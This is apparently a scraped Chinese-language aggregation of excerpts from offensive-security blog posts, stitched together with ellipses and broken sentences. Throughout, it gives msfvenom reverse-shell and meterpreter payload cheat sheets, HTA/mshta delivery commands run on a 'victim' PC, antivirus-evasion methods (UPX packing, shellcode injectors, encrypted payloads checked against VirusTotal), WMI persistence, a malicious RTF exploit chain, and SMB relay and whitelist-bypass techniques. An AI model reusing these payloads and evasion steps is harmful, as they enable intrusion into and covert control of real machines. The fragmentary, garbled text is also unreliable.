Socat 和 Netcat 都有用于 Windows 的 .exe 版本。3. Metasploit -- multi/handler:注意,以下有效载荷、有效负载等指的是 payload 的意思。...可以说交互式程序在非交互式 shell 中不起作用。...请注意,某些目标可能需要指定 Python 版本。如果是这种情况,请根据需要将 “python” 替换为 “python2” 或 “python3”。...的意思我们很快就会考虑使用 msfvenom 生成有效负载,但在此之前,让我们使用我们已经介绍过的工具看一下一些常见的有效负载。...在几乎总是需要静态二进制文件的 Windows 上,此技术将非常有效。
该模块托管一个HTML应用程序(HTA),该应用程序在打开时将通过Powershell运行有效负载。当用户导航到HTA文件时,IE将在执行有效负载之前两次提示它们。...当hta由mshta.exe启动时,它使用已签名的Microsoft二进制文件,使您可以调用PowerShell并将有效负载直接注入内存。 执行以上命令后,您将打开一个会话。...在键入3后按Enter键,该过程将开始,您将拥有处理程序(multi / handler) 现在,将您的恶意IP转换为位链接,当您与受害者共享此链接时,这些链接对受害者将更真实。...您可以从这里下载 下载并运行后,键入以下命令以访问模块: use Bypass 现在查看有效负载列表: list 现在,从有效负载列表中,您可以选择任何人进行所需的攻击。...生成shellcode时,它将要求您提供有效负载的名称。默认情况下,它将以“有效载荷”作为名称。因为我不想给任何名字,所以我只按Enter键。 现在,它制作了两个文件。
此处应有图, 但并没有。...02 Win 本以为win的比较好做,毕竟原文已经给出了调用powershell的poc了,但...先看看原文的调用 up 'C:\\Windows\\System32\\cmd.exe /c (start...powershell /w hidden /enc %k0%%k1%%k2%%k3%)"' 先拿去试了一试,可以成功执行,但hidden参数并不起作用,powershell的窗口一闪而过 直接在cmd...终端甚至WebShell下通过cmd /c 调用的powershell时加上hidden参数是不应该有任何闪窗的 然后意识到这里用了start来启一个进程,这与以下的命令虽然像,但效果可不同, 果然是调用方式问题... 替换到powershell模板里,然后python3 -m http.server 80 将下载的url转为base64, 切割成四段, 隐藏到配置文件中...
使用both staged的payload时,shellcode会更小,从而导致启动程序二进制文件更小。...上图演示了如何使用msfvenom生成原始shellcode。我们指定payload连接的IP和端口,并将输出保存到文件中。处理大文件时,该head命令只能用于打印第一个字符。...当前,源模板文件的路径被硬编码到python脚本中,但是可以很容易地对其进行修改,以允许用户使用该argparse库在不同的模板之间进行选择。...由于shellcode是未加密地嵌入二进制文件中的,因此防御者将能够在不执行启动程序二进制文件的情况下检测到恶意负载。 ?...对蓝色团队成员有用的注释是,即使payload在嵌入发射器二进制文件之前已被加密;通过在调试器中逐步执行,仍可以转储未加密的payload。
可以使用此模块创建多个有效负载,它有助于在几乎任何情况下为您提供外壳。对于这些有效负载中的每一个,您都可以进入 msfconsole 并选择exploit/multi/handler。...为使用的相关负载运行“设置负载”并配置所有必要的选项(LHOST、LPORT 等)。执行并等待有效负载运行。...对于下面的示例,它是不言自明的,但 LHOST 应填写您的 IP 地址(如果在网络内进行攻击,则为 LAN IP,如果通过 Internet 进行攻击,则为 WAN IP),并且 LPORT 应该是您希望重新连接的端口...> -f exe > shell.exe Mac msfvenom -p osx / x86 / shell_reverse_tcp LHOST = LPORT = LPORT = -f war > shell.war Python msfvenom -p cmd / unix / reverse_python
Metasploit-有效负载备忘单 “MSF生成各种有效负载的命令备忘录,建议收藏,忘了就拿出来多看看!” 列出有效载荷: msfvenom -l ?...二进制文件 Linux: msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = LPORT = -f elf...exe> shell.exe Mac: msfvenom -p osx / x86 / shell_reverse_tcp LHOST = LPORT = -f macho...脚本有效负载 Python: msfvenom -p cmd / unix / reverse_python LHOST = LPORT = -f raw> shell.py...Msfvenom将输出能够以这种语言剪切和粘贴的代码,来供利用。 为了安全请将工具放在虚拟机运行! 作者不易!请点一下关注在走吧! 请严格遵守网络安全法相关条例!
该文件将自动存储在 WMI 存储库中,并且恶意负载/命令将自动执行。 mofcomp.exe ....每次 Windows 启动时,任意有效负载将在 60 秒内执行。 每次重启后,可执行文件将在 60 秒内返回 Meterpreter 会话。...Metasploit 实用程序“ msfvenom ”可以生成所需的有效负载,但也可以使用 任何其他工具,例如unicorn 。...该模块支持不同的选项,可用于触发要在系统上执行的任意有效负载。默认情况下,配置为在系统上创建特定事件 ID (4625) 时执行有效负载。...以下模块可以在特定的每日时间、登录失败期间和启动时 5 分钟内执行有效负载。
此外,请确保在安装过程中选择“将python.exe添加到环境变量”选项。...: wget http://10.0.2.10/mrtp.py -O mrtp.py 然后,按照下图创建setup.py文件,并执行以下命令,命令执行后会生成mrtp.exe文件: python.exe...我们已经看到,windows顺利反弹了一个shell,然后我们在www.virtutotal.com网站上对“mrtp.exe”文件进行扫描。...那么现在,我们在正式的windows10环境下运行一下。将“mrtp.exe”文件直接复制到Windows 10主机上。...您需要做的就是重复以上教程中的步骤,使用msfvenom生成 “mrtp.py”文件并对他进行编辑。 将您编写的python代码转换成base64字符串,并替换原来的base64字符串。
此模块承载一个HTML应用程序(HTA),打开时将通过PowerShell运行有效负载。当用户打开HTA文件时,IE会在执行exploit之前提示用户两次。...创建文件后,打开python服务器,通过输入以下内容将文件共享到受害者的PC: python -m SimpleHTTPServer 80 输入以下命令运行上述文件: mshta.exe http:192.168.1.109.../shell.hta 同时,在受害者的命令提示符中运行上述文件时,启动handler以接收会话。...当我们添加了代码时,让我们通过键输入以下内容在受害者的PC中执行该文件: mshta.exe http://192.168.1.109/CACTUSTORCH.hta 同时,启动multi/handler...一个资源文件和另一个hta文件 现在,首先,在/usr/share/greatsct输出中输入以下命令启动python的服务器: python -m SimpleHTTPServer 80 现在在受害者
这一切始于遇到用Golang编写的Github存储库时,该存储库在执行时会将shellcode注入正在运行的进程中. https://github.com/brimstone/go-shellcode...通过简单地使用msfvenom生成有效负载,我们对其进行了测试,发现Windows Defender可以轻松检测到该有效负载.Meterpreter有效负载生成如下: msfvenom -p Windows...Windows Defender立即检测到没有UPX压缩的.exe包含Meterpreter有效负载. 但是,运行自定义UPX压缩的.exe文件成功,并且实现了反向Shell ?...成功运行UPX压缩的Go exe文件,并且在受害者的计算机上获得了反向外壳. 让我们针对VT运行它,以检查其免杀能力. ?...只有两个防病毒引擎在该文件中发现有恶意负载,并且两个都没有指定上载到底是恶意的,只是它是恶意的.UPX压缩可能是触发警报的原因,因为UPX压缩可用于混淆恶意文件. ?
TheFatRat 的很多免杀方式是借助于 msfvenom 编码、upx 等加壳压缩、c/c# 编译等将 powershell 混淆后编译成 exe 或 bat 文件,但有些在执行时还是会调用 powershell...使用 avoidz 编译 python 生成 exe(VT 免杀率 11/68) 使用 python 生成 exe 文件 ....详细文章链接:https://mp.weixin.qq.com/s/JYMq_qHvnslVlqijHNny8Q AVIator 使用 AES 加密来加密给定的 Shellcode 加密,生成一个包含加密有效负载的可执行文件...,最终依靠 PowerShell 执行最终的 shellcode 有效负载。...virustotal.com 上 ps1.exe 文件的查杀率为 36/69,转 exe 后略微有点惨。 ?
(2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为exe,-o选项指定输出的文件名为payload.exe,保存在根目录下...f c 利用rc4对传输的数据进行加密,密钥在生成时指定,在监听的服务端设置相同的密钥。...LPORT=3333 -f exe > shell.exe windows下生成32位/64位payload时需要注意:以windows/meterpreter/reverse_tcp为例,该payload...-p cmd/unix/reverse_python LHOST=10.211.55.2 LPORT=3333 -f raw > shell.py msfvenom -a python -p python.../plugins/msfvenom/ # 打开 ~/.zshrc 文件,启用插件 plugins=(...
这一切始于遇到用Golang编写的Github存储库时,该存储库在执行时会将shellcode注入正在运行的进程中. https://github.com/brimstone/go-shellcode...通过简单地使用msfvenom生成有效负载,我们对其进行了测试,发现Windows Defender可以轻松检测到该有效负载.Meterpreter有效负载生成如下: msfvenom -p Windows...Windows Defender立即检测到没有UPX压缩的.exe包含Meterpreter有效负载....但是,运行自定义UPX压缩的.exe文件成功,并且实现了反向Shell 成功运行UPX压缩的Go exe文件,并且在受害者的计算机上获得了反向外壳....只有两个防病毒引擎在该文件中发现有恶意负载,并且两个都没有指定上载到底是恶意的,只是它是恶意的.UPX压缩可能是触发警报的原因,因为UPX压缩可用于混淆恶意文件.
如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?...-o lyshark.exe 上方的代码就可以生成一个lyshark.exe的可执行文件,将此文件上传到VirusTotal,发现它会被大量反病毒引擎所查杀,这是正常的,因为它是一个常见的Payload...此外,当从远程位置以ASCII格式加载ShellCode时,需要执行额外步骤,要将指令转换为准备执行的原始二进制格式,这里的get_shellcode()并没有填充完整。...本次杀毒,你会发现误报全部消失了,因为在可执行文件中并没有恶意的ShellCode,并且也没有添加任何的下载函数,但如果添加了下载函数,此种方法生成的后门依然会存在误报。...PAGE_EXECUTE_READWRITE); memcpy(exec, value, code_length / 2); ((void(*)())exec)(); WSACleanup(); return 0; } 最终的有效负载成功地向侦听主机发送了反向
使用pyinstaller能很方便的将python脚本打包成单个exe文件。 但是最近有一个需求,打包出来的exe文件需要用管理员权限执行!...也就是双击exe文件运行时,需要弹出一个uac界面让用户授权。 于是我查找pyinstaller的官方文档,说是在打时包加上--uac-admin参数就行了!...然而我实际操作了一下,发现直接加上这个参数仅在打包成多文件时有效 ,打包成单文件时是没用的。 但是我就想打包成单个exe文件,又要uac用户授权界面,怎么办?...我们打包时是有加--uac-admin这个参数的,但是在打包出来的exe文件上却没有看到uac的小盾牌图标!...到此这篇关于pyinstaller打包单文件时–uac-admin选项不起作用怎么办的文章就介绍到这了,更多相关pyinstaller –uac-admin内容请搜索ZaLou.Cn以前的文章或继续浏览下面的相关文章希望大家以后多多支持
当用户打开文档时,winword.exe将会向远程服务器发出HTTP请求,以索取恶意HTA文件。 3. 服务器返回的文件是一个带有嵌入式恶意脚本的假RTF文件。 4....将innocent.doc和server.py两个文件放置在攻击机上并开启Apache服务 漏洞利用步骤一:制作恶意RTF文件 新建一个Word文档按照下图进行配置 ? 另存为RTF格式 ?...使用文本编辑器软件打开test.rtf文件,在文件中查找objupdate,然后在objautlink后面插入objupdate ?...漏洞利用步骤二:配置攻击机 使用msfvenom生成反弹shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.104 LPORT...=4444 -f exe > shell.exe 运行server.py服务 python server.py 80 http://10.10.10.104/shell.exe /var/www/html
use_encryption = true 启用加密 [通信内容加密传输,有效防止流量被拦截] use_compression = true 启用压缩 [传输内容进行压缩,有效减小传输的网络流量,加快流量转发速度...Link Listener 在已上线的主机创建Listener。 ? 导出该类型Listener对应的可执行文件或dll等。 ? 选择刚建立的Listener。 ?...-i 5 -f exe -o x86shell.exe ?...但主session掉,均掉! 在获取目标一个sessions 后,可以查看IP段信息并自动添加路由表。 msf5 exploit(multi/handler) > sessions 1 ?...上述是在meterpreter权限中添加,或当知道目标路由表信息时,可直接添加。
0x01 fsi.exe白名单的利用 fsi.exe、fsianycpu.exe是FSharp解释器,这些具有Microsoft签名的二进制文件包含在Visual Studio中,可用于在命令行下直接执行...安装Visual Studio时这两个文件并没有被添加至环境变量中,所以需要填写绝对路径或者切换到这个目录下才能执行,路径中带有空格时还要用“”双引号给括起来。...白名单的利用 cdb.exe是Windows调试工具(Debugging Tools)附带的一个具有Microsoft签名的二进制文件,可以调试指定进程,且在指定进程里分配RWX属性内存并写入shellcode...接着再将提取出来的shellcode拷贝到shellcode2wds.py脚本中的buf处,使用python执行这个脚本进行进一步处理,最终生成出执行上线时需要用到的shellcode.wds,py脚本可见文末...将cdb.exe白名单和刚生成的shellcode.wds一起上传至目标主机的可读写目录中,然后在中国菜刀的虚拟终端执行以下命令后即可得到反弹cmdshell,如遇360时只需加上cmd /c就能绕过。
SCF文件,在文件名前面添加@符号可以将hack.scf放在共享驱动器文件列表的顶部。...MSFVenom可用于生成将在目标上执行的有效载荷: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.171 LPORT=5555...-f exe > hack.exe 利用Impacket中的smbrelayx 这个python脚本可以设置中继攻击并在当目标主机尝试连接SMB服务器时提供有效载荷。.../hack.exe 同时利用MSF设置木马的回连端: exploit/multi/handler 模块需要配置与生成的有效载荷相同的参数。...; 开启impacket里的smbsever服务,把ms15-051x64和nc64.exe放到我指定的共享文件, python smbserver.py Share '/root/htb/bastard
使用 Python 的一个好处是它可以在终端窗口中记录 HTTP 服务器上的活动。这使您可以确认文件已下载。或者,如果您发现了盲 RCE 漏洞并需要确认其是否有效,也可以使用此方法。...Certutil 的主要功能是转储和显示证书颁发机构 (CA) 配置信息。但是,当使用-f、-split和-urlcache开关时,您可以从任何 URL 下载任何文件!...有时我尝试使用 cmd.exe 方法从 FTP 下载文件但失败。但随后,使用 ascii 编码测试 PowerShell 版本,它起作用了。...您还可以使用 msfvenom 制作 meterpreter 负载,然后将其传输给受害者,从常规 shell 升级到 meterpreter shell。...一旦有效负载位于受害者上,启动多处理程序侦听器,然后执行有效负载,您将在多处理程序上拥有一个 meterpreter shell。
领取专属 10元无门槛券
手把手带您无忧上云